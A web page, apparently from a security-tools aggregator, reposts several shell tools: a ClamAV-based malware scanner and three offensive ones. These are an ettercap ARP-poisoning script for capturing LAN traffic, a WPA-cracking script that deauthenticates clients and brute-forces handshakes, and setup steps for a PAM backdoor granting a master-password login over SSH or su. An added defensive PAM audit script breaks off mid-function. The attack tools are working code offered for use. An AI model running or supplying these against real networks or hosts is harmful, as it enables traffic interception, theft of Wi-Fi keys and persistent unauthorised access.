— Via Cronjob: 30 3 * * * /usr/local/bin/malscan -[options] /path/to/target/directory/or/file

Bash Script :

#!/bin/bash
# Malscan - Enhanced ClamAV Scanning System
# Written by Josh Grancell

VERSION="1.4.3"
DATE="May 5 2015"

## Identifying where we're running the script from
SOURCE="${BASH_SOURCE[0]}"
while [ -h "$SOURCE" ]; do # resolve $SOURCE until the file is no longer a symlink
  DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
  SOURCE="$(readlink "$SOURCE")"
  [[ $SOURCE != /* ]] && SOURCE="$DIR/$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it relative to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"

## Loading the configuration file from the Malscan directory
source "$DIR/conf.malscan"
LOGDIR="$MAINDIR/log"
####################
## DOING THE WORK ##
####################

## Parsing through the arguments
if [[ $# -eq 0 || "$1" == "-h" || "$1" == "--help" ]]; then
	## Help functionality
	echo "Malscan version $VERSION compiled on $DATE"
	echo "Configuration options can be found in conf.malscan"
	echo "Usage: malscan [options] /path/to/scanned/directory"
	echo "       -s  -- Scan the specified file or directory"
	echo "       -q  -- Quarantine a file"
	echo "       -m  -- Checks the extension to verify it matches the MIME"
	echo "       -l  -- Checks files for lines over a certain length"
	echo "       -r  -- Report a file."
	echo "       -n  -- Send email notification."
	echo "       -h  -- Display this help text"
	echo "       -v  -- Display version information"
	echo "Malscan is a robust file scanning tool that combines the"
	echo "ClamAV virus scanner with enhanced definition sets."
	exit 1	
elif [[ $# == 1 ]]; then
	if [[ "$1" == "-v" ]]; then
		echo "Malscan version $VERSION -- last update $DATE"
		exit 0
	elif [[ -f "$1" || -d "$1" ]]; then
		AVSCAN=1
		TARGET="$1"
	else
		## Help functionality
		echo "Malscan version $VERSION compiled on $DATE"
		echo "Usage: malscan [options] /path/to/scanned/directory/or/file"
		echo "       -q|--quarantine  -- Quarantine a file"
		echo "       -m|--mime-check  -- Checks the extension to verify it matches the MIME"
		echo "       -l|--line-length -- Checks files for lines over a certain length"
		echo "       -r|--report      -- Report a file."
		echo "       -n|--notify      -- Send email notification. This flag cannot be used by itself, and must be followed by -r, -q, or -m."
		echo "       -h|--help        -- See this text"
		echo "       -v|--version     -- See version information"
		echo "Malscan is a robust file scanning tool that combines the"
		echo "ClamAV virus scanner with enhanced definition sets."
		exit 1	
	fi
elif [[ $# -eq 2 ]]; then
	## Setting the scanning target
	TARGET="$2"

	## Enabling Quarantine
	if [[ "$1" =~ q ]]; then
		QUARANTINE=1
	fi

	# Enabling mime-type scanning
	if [[ "$1" =~ m ]]; then
		MIMESCAN=1
	fi

	# Enabling line length scanning
	if [[ "$1" =~ l ]]; then
		LENGTHSCAN=1
	fi

	# Enabling signature reporting
	if [[ "$1" =~ r ]]; then
		REPORT=1
	fi

	# Enabling email notification
	if [[ "$1" =~ n ]]; then
		NOTIFICATION=1
	fi

	# Enabling full scan
	if [[ "$1" =~ s ]]; then
		AVSCAN=1
	fi
elif [[ -d "$1" || -f "$1" ]]; then
	AVSCAN=1
else
	## Help functionality
	echo "Malscan version $VERSION compiled on $DATE"
	echo "Usage: malscan [options] /path/to/scanned/directory"
	echo "       -q|--quarantine  -- Quarantine a file"
	echo "       -m|--mime-check  -- Checks the extension to verify it matches the MIME"
	echo "       -l|--line-length -- Checks files for lines over a certain length"
	echo "       -r|--report      -- Report a file."
	echo "       -n|--notify      -- Send email notification. This flag cannot be used by itself, and must be followed by -r, -q, or -m."
	echo "       -h|--help        -- See this text"
	echo "       -v|--version     -- See version information"
	echo "Malscan is a robust file scanning tool that combines the"
	echo "ClamAV virus scanner with enhanced definition sets."
	exit 1
fi

## Defining the lengthscan function
function lengthscan {
	# Creating the log file name for this scan
	LENGTHLOG="$LOGDIR"/'length-scan-'$(date +%F-%s)

	# Turning the comma-separated whitelist into find(1) arguments (one -not -name per entry);
	# a single quoted string would reach find as one argument and never match anything
	LENGTH_IGNORE=()
	IFS=',' read -r -a WHITELIST_ENTRIES <<< "$LENGTH_WHITELIST"
	for ENTRY in "${WHITELIST_ENTRIES[@]}"; do
		[[ -n "$ENTRY" ]] && LENGTH_IGNORE+=(-not -name "$ENTRY")
	done

	echo -e "\033[32mScanning $TARGET for files with strings longer than $LENGTH_MINIMUM characters: \033[37m"

	while IFS= read -r FILE
	do
		# wc -L prints the longest line length followed by the file name; keep only the number
		SIZE=$(wc -L "$FILE" | awk '{print $1}')
		if [[ "$SIZE" -ge "$LENGTH_MINIMUM" ]]; then
			echo -ne "\033[35m"
			echo "DETECTION: $FILE has been detected with a line length of $SIZE." | tee -a "$LENGTHLOG"
			echo -ne "\033[37m"
		fi
	done < <(find "$TARGET" -type f "${LENGTH_IGNORE[@]}" -print)

	# Checking to see if we have hits.
	if [[ -f "$LENGTHLOG" ]]; then
		# Notifying of detections
		echo -e "\033[31mSee $LENGTHLOG for a full list of detected files.\033[37m"

		# If remote logging is enabled, reporting this to our remote SSH server
		if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
			rsync -avzP "$LENGTHLOG" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
		fi

		DETECTION=1
	else
		# No detections
		echo -ne "\033[32m"
		echo "No suspicious files detected." | tee -a "$LENGTHLOG"
		echo -ne "\033[37m"
		DETECTION=0
	fi
}

## Defining the mimescan function
function mimescan {
	# Creating the log file name for this scan
	MIMELOG="$LOGDIR"/'mimecheck-'$(date +%F-%s)
	TEMPLOG=$(mktemp)

	# Turning the comma-separated whitelist into find(1) arguments (one -not -name per entry)
	MIME_IGNORE=()
	IFS=',' read -r -a WHITELIST_ENTRIES <<< "$MIME_WHITELIST"
	for ENTRY in "${WHITELIST_ENTRIES[@]}"; do
		[[ -n "$ENTRY" ]] && MIME_IGNORE+=(-not -name "$ENTRY")
	done

	echo -ne "\033[32mCompiling a full list of potential files... "
	find "$TARGET" -type f "${MIME_IGNORE[@]}" -regextype posix-extended -regex '.*\.(jpg|png|gif|swf|txt|pdf)$' >>"$TEMPLOG"
	echo "Completed!"
	echo -e "Searching found files for any MIME mismatch against the given extensions.\033[37m"

	# Working through the temporary file list to match files with mimetypes.
	while IFS= read -r FILE; do
		# file(1) reports PHP sources as "PHP script" regardless of their extension
		if file "$FILE" | grep -Eq '(jpg|png|gif|swf|txt|pdf).*?(PHP)'; then
			if [ "$(basename "$FILE")" != "license.txt" ]; then
				echo -ne "\033[35m"
				echo "DETECTION: $FILE has been detected as a PHP file with a non-matching extension." | tee -a "$MIMELOG"
				echo -ne "\033[37m"
			fi
		fi
	done < "$TEMPLOG"
	rm -f "$TEMPLOG"

	# Checking to see if we have hits.
	if [[ -f "$MIMELOG" ]]; then
		# Notifying of detections
		echo -e "\033[31mSee $MIMELOG for a full list of detected files.\033[37m"

		# If remote logging is enabled, reporting this to our remote SSH server
		if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
			rsync -avzP "$MIMELOG" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
		fi

		DETECTION=1
	else
		# No detections
		echo -ne "\033[32m"
		echo "No suspicious files detected." | tee -a "$MIMELOG"
		echo -ne "\033[37m"
		DETECTION=0
	fi
}

## Defining the scanning function
function avscan {

	CLAMSCAN=$(which clamscan)

	# Setting up the whitelist
	AVSCAN_IGNORE=${AVSCAN_WHITELIST//,/ --exclude=}

	# Creating the scan log file for this scan
	SCANLOG="$LOGDIR"/$(date +%F-%s)

	# Outputting the scanning information to stdout as well as the log file
	echo -ne "\033[31m"
	echo "--exclude=$AVSCAN_IGNORE" | xargs "$CLAMSCAN" -d "$MAINDIR"/rfxn.hdb -d "$MAINDIR"/rfxn.ndb -d "$MAINDIR"/custom.hdb -d "$MAINDIR"/custom.ndb -i -r --no-summary "$TARGET" | tee -a "$SCANLOG"
	echo -ne "\033[37m"

	## If no files were found, we'll add a note into the scanlog accordingly.
	if [[ ! -s "$SCANLOG" ]]; then
		echo -ne "\033[32m"
		echo "Malware scan completed. No malicious files found." | tee -a "$SCANLOG"
		echo -ne "\033[37m"
		DETECTION=0
	else
		echo -e "\033[31mSee $SCANLOG for a full list of detected files.\033[37m"
		# Detections were logged, so the notification function has something to report
		DETECTION=1
	fi

}

## Defining the quarantine function
function quarantine {
		## This logic actively quarantines files that are not on our whitelist
		while read -r; do
			ABSPATH=$(readlink -f "$REPLY")
			
			## Setting the detection variable to 1, which allows us to parse the correct notification
			if [[ -f "$ABSPATH" ]]; then
				DETECTION=1
			fi
			
			# Building the file structure for quarantine
			DIR=$(dirname "$ABSPATH")
			FILE=$(basename "$ABSPATH")
			mkdir -p "$QDIR"/"$DIR"
			mv "$ABSPATH" "$QDIR""$ABSPATH"

			# If remote quarantine is set up, copying these files to the remote quarantine server
			if [[ "$REMOTE_QUARANTINE_ENABLED" == 1 ]]; then
				rsync -avzP "$QDIR"/ -e ssh "$REMOTE_SSH:$REMOTE_QUARANTINE" >> /dev/null
			fi

			# Setting the files to 000 permissions so they cannot be accessed
			chmod 000 "$QDIR""$ABSPATH"
			echo -e "\033[36m$FILE quarantined and locked down in $QDIR and sent to Centauri.\033[37m" | tee -a "$LOGDIR"/quarantine.log
		done < <(cut -d: -f1 "$SCANLOG")
}

function notification {
	if [[ "$DETECTION" == 1 ]]; then
		EMAIL_TMP=$(mktemp)
		{
		echo "To:$EMAIL"
		echo "From:automated-malscan-service@campbellmarketing.services"
		echo "Subject: Malware Detections: $HOSTNAME - $(date)" 
		echo "MIME-Version: 1.0"
		echo "Content-Type: text/html; charset=\"us-ascii\""
		echo "Content-Disposition: inline"
		echo "<!DOCTYPE html>"
		echo "<html> <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">"	
		echo "<body>"

		if [[ -n "$QUARANTINE" && -n "$AVSCAN" ]]; then
			echo "Malicious and/or suspicious files have been quarantined on $HOSTNAME. Please see $LOGDIR/quarantine.log for further information.<br />"
		elif [[ -n "$AVSCAN" ]]; then
			echo "Malicious and/or suspicious files have been identified on $HOSTNAME but HAVE NOT been quarantined. Please see $SCANLOG for further information.<br />"
		fi

		if [[ -n "$MIMESCAN" ]]; then
			echo "PHP files have been detected on $HOSTNAME that are using suspicious file extension types. Please see $MIMELOG for additional information, and investigate each file for whitelisting or quarantining.<br />"
		fi

		if [[ -n "$LENGTHSCAN" ]]; then
			echo "Files have been detected that exceed the line length threshold, and may be suspicious. Please see $LENGTHLOG for additional information, and investigate each file for whitelisting or quarantining.<br />"
		fi
		} >> "$EMAIL_TMP"

		sendmail -i -t < "$EMAIL_TMP"	
	fi
}

function report {
	# Creating the report file name
	REPORTFILE="$LOGDIR"/report-"$HOSTNAME"-$(date +%s).log

	# Generating the malware signature
	sigtool --md5 "$TARGET" >> "$REPORTFILE"

	# If remote logging is enabled, reporting this to our remote SSH server
	if [[ "$REMOTE_LOGGING_ENABLED" == 1 ]]; then
		rsync -avzP "$REPORTFILE" -e ssh "$REMOTE_SSH:$REMOTE_LOGGING"/"$HOSTNAME"/
	fi

	echo -e "\033[36mFile signature generated and reported to Centauri for inclusion in the DB.\033[37m"
	exit 0
}


# Executing the Functions
if [[ -n "$REPORT" ]]; then
	report
fi

if [[ -n "$MIMESCAN" ]]; then
	mimescan
fi

if [[ -n "$LENGTHSCAN" ]]; then
	lengthscan
fi

if [[ -n "$AVSCAN" ]]; then
	avscan
	if [[ -n "$QUARANTINE" ]]; then
		quarantine
	fi
fi

if [[ -n "$NOTIFICATION" ]]; then
	notification
fi

# Cleaning up by chowning everything to the clam user
chown -R "$USER":"$USER" "$MAINDIR"

exit 0

 

Download : Master.zip  | Clone Url
Source : https://github.com/jgrancell

MITM_Toolkit – A toolkit for automating MITM attack management.


MITM_Toolkit is a toolkit for automating MITM attack management with ettercap.
Incremental Poison
This shell script accepts 3 arguments. The interface you are using (eth1, eth2, etc…), the number of concurrent hosts you want to poison, and the name of a directory you want to output the packet captures to. When launched, it will open a separate gnome-terminal (so you have to do it in the desktop interface), and will start poisoning. To move to the next batch, just hit the ‘q’ button on that interface and it will gracefully shutdown, re-ARP the hosts (to prevent disruption), and then launch the next set. While this is happening, everything is being dumped into an organized collection of log files. Currently the script assumes the gateway is on your /24 network (so should work out of the box 90% of the time). Will be updating to support more unusual cases as well.
Bash Script :

#!/bin/bash

## Arguments <interface> <number of concurrent hosts> <Unique_Scan_Name>

function splash {
  # Backticks inside double quotes start a command substitution, so they are escaped here
  echo ""
  echo "                 . '  ."
  echo "               ' .( '.) '"
  echo "       _     ('-.)' (\`'.) '"
  echo "      |0|- -(. ')\`( .-\`) (-')"
  echo "   .--\`+'--.  .  (' -,).(') ."
  echo "   |\`-----'|   (' .) - ('. )"
  echo "   |       |    . (' \`.  )"
  echo "   |  .-.  |       \` .  \`"
  echo "   | (0.0) |"
  echo "   | >|=|< | INCREMENTAL"
  echo "   |  \`\"\`  |    POISON"
  echo "   |       |       ...just a little at a time"
  echo "   |       |"
  echo "   \`-.___.-'"
  echo ""
  echo ""
}
if [ "$#" -ne 3 ]; then
  splash
  echo "Description - This script will start poisoning between the defined number of hosts and the gateway"
  echo "...As soon as each terminal is gracefully ended with 'q', the next one will begin"
  echo ""
  echo "Usage - ./incremental_poison.sh [interface] [# of concurrent hosts] [Unique_Scan_Name]"
  echo "Example - ./incremental_poison.sh eth1 4 BobsHardware_Scan1"
  echo ""
  echo "*****************************************************"
  echo "******************* -- WARNING -- *******************"
  echo "*****************************************************"
  echo "**                                                 **"
  echo "** Caution should be taken when using this script  **"
  echo "** As with any ARP Poisoning utility, significant  **"
  echo "** disruption can result from misuse...            **"
  echo "**                                                 **"
  echo "*****************************************************"
  echo ""
  echo "Author - Justin Hutchens - justinhutchens@gmail.com"
  echo ""
  exit
fi

## Launch awesome ASCII splash art
splash

## Cleanup Residual Temp Files
rm -f *.temp

## Initialize arguments passed into variables
iface=$1
hosts=$2
scanname=$3

## Create Scan Directory
mkdir $scanname

## Identify IP address, network prefix, and local /24 range
ip=$(ifconfig $iface | grep inet | grep -v "inet6" | cut -d ":" -f 2 | cut -d " " -f 1)
prefix=$(echo $ip | cut -d "." -f 1-3)
range="$prefix.0/24"

## Perform basic discovery scan on local /24 range to output to temp file
nmap -sn $range -oG results.temp

## Extract live IPs into another temp file
cat results.temp | grep "Up" | cut -d " " -f 2 > targets.temp

## Identify number of live IPs in range
lines=$(wc -l targets.temp | cut -d " " -f 1)
echo "[+] $lines total hosts identified in range..."

## Initialize incremental counters
x=2
i=1

## While-loop that extracts the subsequent group of addresses, and then launches poisoning in new terminal
while [ $x -lt $(($lines+5)) ]; do 
  group=$(sed -n $x,$(($x+$(($hosts-1))))p targets.temp | cut -d "." -f 4); 
  echo ""; 
  echo "[+] Starting Ettercap Capture $i..."; 
  gnome-terminal -x ettercap -M arp:remote /$prefix.1/ /$prefix.$(echo $group | sed 's/ /,/g')/ -T -i $iface -w $scanname/${scanname}_output$i.pcap;   # braces needed: $scanname_output would expand to an (empty) variable of that name
  sleep 5;
  pid=$(ps aux | grep "ettercap -M" | grep -v "grep" | awk '{print $2}'); 
  while [ $pid ]; do 
    echo "...Still running"; 
    sleep 30; 
    pid=$(ps aux | grep "ettercap -M" | grep -v "grep" | awk '{print $2}'); 
  done; 
  echo "[+] Process killed"; 
  echo "[+] Starting next capture..."; 
  echo "";
  x=$((x+$hosts)); 
  i=$((i+1)); 
done

## Cleanup Temp Files
rm *.temp

Download : Master.zip  | Clone Url
Source : https://github.com/hack1thu7ch

WPA Attack – Extremely simple script that can be used to crack a WPA network password.


WPA Attack is an extremely simple script that can be used to crack a WPA network password.
How it works: it runs three separate konsole processes:
– aircrack-ng, which is used to crack the passphrase using .cap files
– airodump-ng, which is used to capture packets from the Access Point along with **
– aireplay-ng (option -0), which is used to disconnect connected clients, so you can capture the WPA handshake when a client tries to reconnect
To be able to crack a WPA/WPA2 passphrase you’ll need to capture the four-way handshake first. This information should pop up in your airodump-ng console window.

Example screenshot WPA-Attack

Requirements:
– Wireless adapter which supports injection (see the Reaver Wiki: https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers)
– Linux Backtrack 5
– Root access on your system (otherwise some things may not work)
– And, if you use another Linux distribution:
— Reaver 1.4 (I didn’t try it with previous versions)
— KDE (unless you’ll change ‘konsole’ invocations to ‘screen’, ‘gnome-terminal’ or something like that… this is easy)
— Gawk (Gnu AWK)
— Macchanger
— Airmon-ng, Airodump-ng, Aireplay-ng
— Perl

Additional info: before you use this script, make sure that it has permission to execute.
If not, type:

WPA-Attack Script:

#!/bin/bash

# TODO: 
# - write PIN + key to file with Perl after PIN recovery

WIRELESS_INTERFACE="wlan0";

################# FUNCTIONS ##############
getKonsolePidByProcessName(){
    ps aux | grep konsole | grep "$1" | awk -F" " '{print $2}'
}

# echo blue text
echoBlue(){
   echo "$(tput setaf 6)>>>>>> ${1}$(tput sgr0)";
}

# echo green text
echoGreen(){
   echo "$(tput setaf 2)>>>>>> ${1}$(tput sgr0)";
}

getWifiCardDriver(){
    lshw -c network | gawk '!/wireless/ || !/driver/{ next; } { while(++i<=NF){ if($i ~ /driver\=/){ sub("driver=","",$i); print $i; } } }';
}

# tries to extract monitor name from the ifconfig output
getMonitorName(){
    ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/\s+.*//; print $_; } }'
}

resetWifiCard(){
  local WIFI_DRIVER=$(getWifiCardDriver);
  local RESET_CARD_DRIVER_CMD="";
  if [[ -z "$WIFI_DRIVER" ]]; then
	echoBlue "Sorry couldn't get your WifiDriver";
	echoBlue "Check if any wifi card is connected and try again";
	echoBlue "You may try to reconnect your wifi card to USB port, and try again.";
	echoBlue "If above solutions doesn't work, you have to check getWifiCardDriver() function on your own...";
	exit;
  else 
	echoBlue "I found that your WIFI driver is $WIFI_DRIVER ";
	echoBlue "Resetting WIFI card ";
	echoGreen "modprobe -r $WIFI_DRIVER && modprobe $WIFI_DRIVER";
	modprobe -r $WIFI_DRIVER && modprobe $WIFI_DRIVER;
  fi
}

stopMonitor() {
	  echoGreen "killall airodump-ng" && killall airodump-ng &>/dev/null;
	  echoGreen "killall aireplay-ng" && killall aireplay-ng &>/dev/null;
	  if [[ ! -z "$MONITOR_NAME" ]]; then
	      echoGreen "airmon-ng stop $MONITOR_NAME" && airmon-ng stop $MONITOR_NAME;
	      echoGreen "airmon-ng stop $WIRELESS_INTERFACE" && airmon-ng stop $WIRELESS_INTERFACE;
	      echoGreen "airmon-ng check" && airmon-ng check;
	  fi
}

startMonitor(){
      echoGreen "airmon-ng start $WIRELESS_INTERFACE" && airmon-ng start $WIRELESS_INTERFACE
}

restartMonitor() {
      stopMonitor;
      startMonitor;
}

changeMacTo(){
      echoBlue "ifconfig $MONITOR_NAME down" && ifconfig $MONITOR_NAME down;
      echoBlue "macchanger -m $1 $MONITOR_NAME" && macchanger -m $1 $MONITOR_NAME;
      echoBlue "ifconfig $MONITOR_NAME up" && ifconfig $MONITOR_NAME up;
}
getRandomMac(){
      echo $(perl -e 'sub l{":".int(rand(9)).int(rand(9));}; print "02".l.l.l.l.l;');
}

################# FUNCTIONS END ##########


############# PARSING OPTIONS #####################
BSSID="";
CHANNEL="";
WORDLIST_FILE="./someDictionary.txt";
SPOOFED_MAC="";
HANDSHAKE_GRAB=0

while getopts "c:b:w:s:h" opt; do
    case "$opt" in
    b)  BSSID=$OPTARG
        ;;
    c)  CHANNEL=$OPTARG
        ;;
    w)  WORDLIST_FILE=$OPTARG
        ;;
    s)  SPOOFED_MAC=$OPTARG
        ;;
    h)  HANDSHAKE_GRAB=1
        ;;
    esac
done

if [[ -z "$BSSID" || -z "$CHANNEL" ]]; then
  echo "Using: $0 [OPTIONS]";
  echo "[OPTIONS]:";
  echo "   -b [BSSID] - you must give bssid of target access point";
  echo "   -c [CHANNEL] - you must give channel of target access point";
  echo "   -w [WORDLIST_FILE_PATH] - path to file containing dictionary";
  echo "   -s [SPOOFED_MAC] - if you want to spoof (change) mac address of your wifi card (safety)";
  echo "   -h only grab handshake for [BSSID] and exit (don't proceed with aircrack)";
  exit;
fi

# not just handshake grab && no wordlist file
if [ $HANDSHAKE_GRAB == 0 ] && [ ! -f "$WORDLIST_FILE" ]; then
    echoBlue "Wordlist file '$WORDLIST_FILE' doesn't exist, please specify valid file";
    exit;
fi

############# PARSING OPTIONS END  ###############
# try to get monitor name if it's already set ?
MONITOR_NAME=$(getMonitorName);
stopMonitor;
resetWifiCard;
startMonitor;

############################### SETUP VARS ####################

CURRENT_DIR=$(pwd);
#capitalize BSSID (in case user gives small letters)
BSSID=$(perl -e 'print uc($ARGV[0]);' "${BSSID}");
BSSID_CLEAR=$(echo $BSSID | sed s/://g);
AIRODUMP_LOG_DIR="${CURRENT_DIR}/airodump_logs";
BSSID_LOG="${AIRODUMP_LOG_DIR}/${BSSID_CLEAR}.log";
CAP_FILE_1="${BSSID_LOG}-01.cap";
CAP_FILE_WILDARD="${BSSID_LOG}-*.cap";
TMP_CONNECTED_CLIENTS="/tmp/WPA-Attack-connected-clients_${BSSID_CLEAR}";
TMP_WPA_HANDSHAKE_GRABBED="/tmp/WPA-Attack-handshake-grabbed_${BSSID_CLEAR}";
NETWORK_CLIENT_MAC="";
# Crack password using password file list
KEY_FOUND_LOG="${CURRENT_DIR}/KEY_FOUND_${BSSID_CLEAR}";
## use random mac (for safety)
RANDOM_MAC=$(getRandomMac);
MONITOR_NAME=$(getMonitorName);

if [[ -z $(ifconfig | grep "$MONITOR_NAME") ]]; then
  echoBlue "Something is wrong, can't start monitor mode for wlan0";
  exit;
fi


if [[ -z "$MONITOR_NAME" ]]; then
   echoBlue "Couldn't find monitor name from your ifconfig output! Can your wifi card work in monitor mode?";
   echoBlue "Setup variable MONITOR_NAME to store proper name like: mon0, wlan0mon... etc.";
   exit;
fi

##############################################################


# spoofed mac ?
if [[ ! -z "$SPOOFED_MAC" ]]; then
   changeMacTo "$SPOOFED_MAC"
else 
   changeMacTo "$RANDOM_MAC";
fi

if [[ ! -d $AIRODUMP_LOG_DIR ]]; then
    mkdir -m 700 $AIRODUMP_LOG_DIR;
fi

# remove old logs for BSSID
rm "$CAP_FILE_WILDARD" 2>/dev/null;

if [[ -f $TMP_CONNECTED_CLIENTS ]]; then
    rm $TMP_CONNECTED_CLIENTS 2>/dev/null;
fi

if [[ -f $TMP_WPA_HANDSHAKE_GRABBED ]]; then
    rm $TMP_WPA_HANDSHAKE_GRABBED 2>/dev/null;
fi

####################### LOGGING PACKETS BY AIRODUMP-NG ###########################################

LOGGING_PACKETS='airodump-ng --showack --bssid='$BSSID' -c '$CHANNEL' -w '$BSSID_LOG' '$MONITOR_NAME' 2>&1 \
		| perl -e '\'' 
		    my @clientMacs="";
		    while(<>){
			# search connected client
			if(/'$BSSID'\s+([A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2}:[A-F0-9]{2})/){
			    # element is not in array
			     if( !($1 ~~ @clientMacs) ){
				push(@clientMacs,$1);
				open TMP_FILE, ">>'$TMP_CONNECTED_CLIENTS'";
				print TMP_FILE "$1\n";
				close TMP_FILE;
			      }
			}
			# if we find WPA-Hanshake we can kill the process
			if(/WPA handshake:/){ 
			      print $_;
			      system("touch '$TMP_WPA_HANDSHAKE_GRABBED'");
			      system("killall -INT airodump-ng");
			      exit;
			}
			print $_;
		    }
		  '\''  ';
konsole -hold -e /bin/sh -c "$LOGGING_PACKETS" 2>/dev/null;
echoGreen "airodump-ng $MONITOR_NAME --bssid=$BSSID -c $CHANNEL -w $BSSID_LOG";


echoBlue "Waiting for clients and WPA-Handshake...";
IFS=$'\n';
while true; do
      if [[ -f $TMP_CONNECTED_CLIENTS ]]; then
	  NETWORK_CLIENTS_MAC=$(cat $TMP_CONNECTED_CLIENTS);
	  for SINGLE_CLIENT in $NETWORK_CLIENTS_MAC; do 
		# Deauthenticate single wireless client (force him to another connection and grab WPA Hanshake)
		DEAUTH_CMD="aireplay-ng -0 10 -a $BSSID -c $SINGLE_CLIENT $MONITOR_NAME";
		echoBlue "Trying to deauthenticate connected client: $SINGLE_CLIENT ...";
		echoGreen "$DEAUTH_CMD";
		konsole -e /bin/sh -c "$DEAUTH_CMD" 2>/dev/null
		sleep 15;
		if [[ -f $TMP_WPA_HANDSHAKE_GRABBED ]]; then
		    echoBlue "WPA Handshake from BSSID $BSSID was grabbed!!!";
		    rm $TMP_WPA_HANDSHAKE_GRABBED;
		    break 2;
		fi
	  done
	  #echo $DEAUTH_CMD;
      fi  
      sleep 30;
done

# if only grabbing handshake - exit after that
if [[ $HANDSHAKE_GRAB == 1 ]]; then
    echoBlue "Handshake was logged to: ${CAP_FILE_1}";
    echoBlue "You can use following command to crack it:";
    echoBlue "aircrack-ng -l ${CURRENT_DIR}/KEY_FOUND_${BSSID_CLEAR} -w ${WORDLIST_FILE} -b ${BSSID} ${CAP_FILE_WILDARD}";
    echoBlue "You used -h option (exit after handshake grab)";
    exit;
fi

################## CRACKING .cap file using wordlist file ############################################



# example command:
#   aircrack-ng -l KEY_FOUND -w ./wordlistExample.txt -b 00:02:72:55:FF:C0 ./airodump_logs/00027255FFC0*.cap
AIRCRACK_CMD="aircrack-ng -l ${KEY_FOUND_LOG} -w ${WORDLIST_FILE} -b ${BSSID} ${CAP_FILE_WILDARD}";
konsole -hold -e /bin/sh -c "${AIRCRACK_CMD}" 2>/dev/null;
echoGreen $AIRCRACK_CMD;

echoBlue "Aircrack will write results to ${KEY_FOUND_LOG}...";
# periodical checking if KEY_FOUND file exists
while true; do
  if [[ -f $KEY_FOUND_LOG ]]; then
      kill -INT $(getKonsolePidByProcessName aireplay-ng)
      killall -INT aireplay-ng
      echoBlue "!!!! KEY WAS FOUND !!!!"
      echoBlue "---------- YOUR WPA KEY IS: ----------------"
      echoBlue $(cat $KEY_FOUND_LOG)
      echoBlue "--------------------------------------------"
      echoBlue "You have it also in file: $KEY_FOUND_LOG"
      exit;
  fi
  sleep 30;
done

Pyrit-Attack Script:

#!/bin/bash

# pyrit -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap analyze
# analyze if there is handshake in a .cap file, it is better than aircrack
# @param .cap file
pyritAnalyzeLog(){
      pyrit -r $1 analyze
}
# pyrit --all-handshakes -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap -i ./WPA-Attack/wordlistExample.txt attack_passthrough
# attacks using .cap file and wordlist file
pyritAttack(){
      pyrit --all-handshakes -b $1 -r $2 -i $3 attack_passthrough
}

if [[ -z "$1" || -z "$2" || -z "$3" ]]; then
  echo "Using: $0 [BSSID] [.cap FILE_PATH] [WORDLIST_FILE_PATH]";
  echo "Example:";
  echo "$0 00:11:22:33:44:55 ./airodump_logs/001122334455.log-01.cap ./wordlistExample.txt";
  exit;
fi

pyritAnalyzeLog $2;
pyritAttack $1 $2 $3;

Download: Master.zip | Clone Url
Source: https://github.com/DominikStyp

pambd – small and fast solution to create an undetectable backdoor through the PAM module.


This trick shows you how to create a PAM module backdoor that allows a user login with your own custom password.

If you try to log in with the real password of the target user and the authentication fails, pam_auth.so switches to pambd.so and vice versa.

Generate the backdoor:
If you get the error:

pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory

First install the package libpam-dev, which contains the header files needed for compilation:

deftcode pambd $ sudo apt-get install libpam0g-dev

Now edit pambd.c and set your master custom password:

#define MYPASSWD "my_master_passwd"

After that, generate the PAM backdoor with the following command (it needs root permissions):

deftcode pambd $ sudo sh gen.sh

::Configure the PAM service you want to hijack::
Edit /etc/pam.d/sshd (or another service that uses PAM, such as /etc/pam.d/su) and replace its content with these lines:

auth            sufficient      pam_rootok.so
auth            sufficient      pam_unix.so     # This must be 'sufficient'.
account         required        pam_unix.so
session         required        pam_unix.so
auth            sufficient      pambd.so        # This is our pam backdoor.
account         sufficient      pambd.so        # --

::Test the backdoor::
After you have created the pambd backdoor, you can test it:

deftcode pambd $ file /lib/security/pambd.so 
/lib/security/pambd.so: ELF 64-bit LSB  shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
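The configuration above depends on two things a defender can check for: an `auth`/`account` line whose control is `sufficient` (so one module short-circuits the whole stack) through a module name that is not a stock PAM module, and a `.so` in /lib/security that no package installed. The following is an added shell example written for this page, not part of pambd; it audits a constructed copy of the pam.d snippet shown above, and with `--live` (a flag of this example only) runs the same checks against the host's /etc/pam.d and module directories using `dpkg -S` or `rpm -qf`. The allow-list of module names is a starting point to extend for the distribution being audited.

```shell
#!/bin/sh
# pam_audit.sh: added defender's example (not pambd code). Flags auth/account
# lines that are 'sufficient' through a module not on an allow-list, and
# optionally reports PAM module files that no installed package owns.

# Constructed sample in the layout the post shows for /etc/pam.d/sshd.
SAMPLE_PAM_CONFIG='auth            sufficient      pam_rootok.so
auth            sufficient      pam_unix.so     # This must be sufficient.
account         required        pam_unix.so
session         required        pam_unix.so
auth            sufficient      pambd.so        # This is our pam backdoor.
account         sufficient      pambd.so        # --'

# Starting allow-list of stock modules; extend it for the distribution you audit.
KNOWN_MODULES="pam_unix.so pam_rootok.so pam_deny.so pam_permit.so pam_env.so pam_nologin.so pam_limits.so pam_systemd.so pam_motd.so pam_mail.so pam_selinux.so pam_loginuid.so pam_keyinit.so pam_access.so pam_succeed_if.so pam_lastlog.so pam_faillock.so pam_pwquality.so pam_sss.so pam_krb5.so pam_ldap.so"

# stdin: a PAM config; stdout: "type control module" per entry,
# with comments and blank lines dropped.
pam_entries() {
    sed -e 's/#.*$//' -e '/^[[:space:]]*$/d' | awk 'NF >= 3 { print $1, $2, $3 }'
}

# stdin: a PAM config; stdout: auth/account entries that short-circuit the
# stack ('sufficient') through a module that is not on the allow-list.
find_unknown_sufficient() {
    pam_entries | while read -r type control module; do
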